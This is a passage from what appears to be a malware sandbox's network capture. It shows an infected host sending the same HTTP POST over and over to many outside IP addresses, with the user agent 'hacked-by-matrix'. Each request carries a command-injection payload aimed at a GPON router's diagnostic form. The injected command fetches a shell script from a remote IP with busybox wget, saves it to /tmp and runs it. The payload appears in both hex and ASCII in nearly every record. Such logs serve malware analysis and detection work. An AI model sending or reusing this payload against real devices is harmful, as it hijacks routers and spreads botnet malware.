                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        957192.168.2.134765642.86.24.143443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686458111 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        958192.168.2.13360945.127.114.41443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686475039 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        959192.168.2.134041042.44.235.206443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686536074 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        960192.168.2.1348448109.193.178.24443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686538935 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        961192.168.2.134730442.148.192.3443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686558008 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        962192.168.2.13563365.11.110.199443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686614990 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        963192.168.2.1354680212.226.172.76443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686640978 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        964192.168.2.1352076109.223.105.52443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686650991 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        965192.168.2.1360678212.236.151.146443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686681032 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        966192.168.2.13473505.173.218.75443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686712980 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        967192.168.2.1355262212.137.9.3443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686737061 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        968192.168.2.13356845.252.232.155443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686743021 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        969192.168.2.1343332212.178.145.130443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686810017 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        970192.168.2.134053842.183.165.140443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686810970 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        971192.168.2.1351466118.21.74.188443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686830044 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        972192.168.2.1346074212.223.120.4443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686856985 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        973192.168.2.1340652109.38.253.102443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686863899 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        974192.168.2.135944242.5.163.147443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686913013 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        975192.168.2.1333122109.228.232.130443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686929941 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        976192.168.2.1359776118.195.209.107443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686949015 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        977192.168.2.1346508118.75.156.129443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686964035 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        978192.168.2.13554325.240.13.90443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687021971 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        979192.168.2.1335884212.170.171.209443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687026024 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
